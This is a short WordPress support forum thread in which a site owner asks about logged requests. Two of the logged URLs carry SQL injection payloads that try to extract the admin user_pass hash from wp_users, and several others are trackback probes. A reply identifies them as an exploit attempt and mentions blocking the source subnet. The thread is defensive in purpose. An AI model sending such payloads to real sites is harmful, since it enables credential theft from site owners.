Title: Security probing?
Last modified: August 19, 2016

---

# Security probing?

 *  [pumpkinpatch](https://wordpress.org/support/users/pumpkinpatch/)
 * (@pumpkinpatch)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/security-probing/)
 * From my logs, I find two requests to the following addresses:
    [http://mysitesdomainname.com/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58)](http://mysitesdomainname.com/index.php?cat=999+UNION+SELECT+null,CONCAT(666,CHAR(58)),
   user_pass,CHAR(58),666,CHAR(58)),null,null,null+FROM+wp_users+where+id=1/* [http://mysitesdomainname.com/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58)](http://mysitesdomainname.com/index.php?cat=%2527+UNION+SELECT+CONCAT(666,CHAR(58)),
   user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+id=1/* Any one know what
   these are for? Was it a probe for flaws? I’m running WP2.5

Viewing 3 replies - 1 through 3 (of 3 total)

 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/security-probing/#post-745338)
 * thats an attmept at an sql exploit .. if you paste that into your browser, does
   it return anything? anything as in, do you see your password?
 *  Thread Starter [pumpkinpatch](https://wordpress.org/support/users/pumpkinpatch/)
 * (@pumpkinpatch)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/security-probing/#post-745340)
 * Both of them resolve to the following page:
    [http://mysitesdomainname.com/index.php/category/](http://mysitesdomainname.com/index.php/category/)
   No password displayed.
 * Came from the following IP:
    87.118.116.150 Hostname: ns.km31026.keymachine.de
 * It also tried the following:
    [http://mysitesdomainname.com/wp-trackback.php?tb_id=1](http://mysitesdomainname.com/wp-trackback.php?tb_id=1)
   [http://mysitesdomainname.com/wp-trackback.php?p=1](http://mysitesdomainname.com/wp-trackback.php?p=1)
   [http://mysitesdomainname.com/wp-trackback.php?p=2](http://mysitesdomainname.com/wp-trackback.php?p=2)
   [http://mysitesdomainname.com/wp-trackback.php?p=3](http://mysitesdomainname.com/wp-trackback.php?p=3)
   [http://mysitesdomainname.com/wp-trackback.php?p=4](http://mysitesdomainname.com/wp-trackback.php?p=4)
   [http://mysitesdomainname.com/wp-trackback.php?p=5](http://mysitesdomainname.com/wp-trackback.php?p=5)
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [18 years, 1 month ago](https://wordpress.org/support/topic/security-probing/#post-745501)
 * thats a very well known IP to me — I nullroute that whole subnet. (its the joys
   of having your own box)

Viewing 3 replies - 1 through 3 (of 3 total)

The topic ‘Security probing?’ is closed to new replies.

 * In: [Everything else WordPress](https://wordpress.org/support/forum/miscellaneous/)
 * 3 replies
 * 2 participants
 * Last reply from: [whooami](https://wordpress.org/support/users/whooami/)
 * Last activity: [18 years, 1 month ago](https://wordpress.org/support/topic/security-probing/#post-745501)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics